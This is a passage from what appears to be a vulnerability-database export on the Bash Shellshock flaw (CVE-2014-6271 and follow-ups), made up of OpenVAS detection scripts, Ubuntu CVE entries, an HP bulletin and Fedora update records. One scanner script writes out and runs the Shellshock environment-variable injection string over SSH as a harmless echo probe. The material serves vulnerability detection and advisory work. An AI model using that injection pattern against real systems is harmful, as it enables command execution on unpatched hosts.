exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.51~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850945", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850945", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850945\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:51:14 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix unexpected code execution with environment\n variables (CVE-2014-6271).\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1293 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882027", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1293 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882027\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-25 05:58:31 +0200 (Thu, 25 Sep 2014)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1293 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a\nshell and command language interpreter compatible with the Bourne shell (sh).\nBash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article linked at the references.\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1293\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:27", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310804490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804490\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 13:50:37 +0530 (Fri, 26 Sep 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/1207723\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141597\");\n script_xref(name:\"URL\", value:\"https://blogs.akamai.com/2014/09/environment-bashing.html\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3\");\n\n script_tag(name:\"solution\", value:\"Apply the patch or upgrade to latest version.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo 'env x=\"() { :;}; echo CVE-2014-6271 vulnerable\" /bin/bash -c \"echo this is a test\"' | /bin/bash\ncmd = \"echo 'env x=\" + '\"' + '() { :;}; echo CVE-2014-6271 vulnerable\" ' + bash_cmd + ' -c \"echo this is a test\"' + \"' | \" + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"CVE-2014-6271 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-08-16T02:58:23", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain\nmalformed function definitions in the values of environment variables,\nwhich allows remote attackers to write to files or possibly have unknown\nother impact via a crafted environment, as demonstrated by vectors\ninvolving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution. NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2014-6271.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1373781>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7169>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | It was discovered that a build issue preventing the fix from being applied properly in the 4.3-7ubuntu1.2 package for Ubuntu 14.04 LTS. A respin was released to 4.3-7ubuntu1.3 to correct the issue, and USN-2363-2 was published.\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "UB:CVE-2014-7169", "href": "https://ubuntu.com/security/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:58:57", "description": "GNU Bash through 4.3 processes trailing strings after function definitions\nin the values of environment variables, which allows remote attackers to\nexecute arbitrary code via a crafted environment, as demonstrated by\nvectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE:\nthe original fix for this issue was incorrect; CVE-2014-7169 has been\nassigned to cover the vulnerability that is still present after the\nincorrect fix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | After updates were released for this issue, it was discovered that the fix was incomplete. The new issue is being tracked as CVE-2014-7169.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6271", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T00:00:00", "id": "UB:CVE-2014-6271", "href": "https://ubuntu.com/security/CVE-2014-6271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:58:38", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function\ndefinitions in the values of environment variables, which allows remote\nattackers to execute arbitrary code or cause a denial of service\n(uninitialized memory access, and untrusted-pointer read and write\noperations) via a crafted environment, as demonstrated by vectors involving\nthe ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules\nin the Apache HTTP Server, scripts executed by unspecified DHCP clients,\nand other situations in which setting the environment occurs across a\nprivilege boundary from Bash execution. NOTE: this vulnerability exists\nbecause of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this issue is mitigated by Florian Weimer's prefix-suffix patch that is included in https://ubuntu.com/security/notices/USN-2364-1 since bash parser vulnerabilities are now limited to specially named environment variables, and as such are no longer directly exposed to CGI scripts, SSH, etc. Once an upstream patch is made available, we will release bash updates, but we don't consider this to be a critical issue requiring immediate attention.\n", "cvss3": {}, "published": "2014-09-27T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2014-09-27T00:00:00", "id": "UB:CVE-2014-6277", "href": "https://ubuntu.com/security/CVE-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T07:53:45", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function\ndefinitions in the values of environment variables, which allows remote\nattackers to execute arbitrary commands via a crafted environment, as\ndemonstrated by vectors involving the ForceCommand feature in OpenSSH sshd,\nthe mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which setting\nthe environment occurs across a privilege boundary from Bash execution.\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this issue is mitigated by Florian Weimer's prefix-suffix patch that is included in https://ubuntu.com/security/notices/USN-2364-1 since bash parser vulnerabilities are now limited to specially named environment variables, and as such are no longer directly exposed to CGI scripts, SSH, etc. Once an upstream patch is made available, we will release bash updates, but we don't consider this to be a critical issue requiring immediate attention.\n", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6278", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2014-09-30T00:00:00", "id": "UB:CVE-2014-6278", "href": "https://ubuntu.com/security/CVE-2014-6278", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hp": [{"lastseen": "2020-10-13T01:01:55", "description": "## Potential Security Impact\nRemote code execution\n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP DreamColor Z27x Professional Display running Bash Shell. This is the Bash Shell vulnerability known as \"ShellShock\" which could be exploited remotely to allow execution of code. \n\n> note:\n> \n> Only the HP DreamColor Z27x model is vulnerable.\n\n## RESOLUTION\nHP is actively working to address this vulnerability for the impacted product versions of HP DreamColor Z27x Professional Display. The display provides calibration and remote management functionality running on embedded Linux, which includes a bash shell. The shell is not accessible via the standard calibration or remote management interfaces.\n\nThis bulletin will be revised when the firmware update is released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-30T00:00:00", "type": "hp", "title": "HPSBHF03119 rev.3 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-26T00:00:00", "id": "HP:C04468293", "href": "https://support.hp.com/us-en/document/c04468293", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:03:00", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:03:00", "id": "FEDORA:6FC4121113", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3AX2SCLHAVYCZKJMPEA2DHWJWYQ4LT7A/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-27T10:08:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-27T10:08:26", "id": "FEDORA:4A9CF241E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EXP5O5EQPO5K5TE7KQLQ7GWB3VPY7N4Q/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:00:48", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 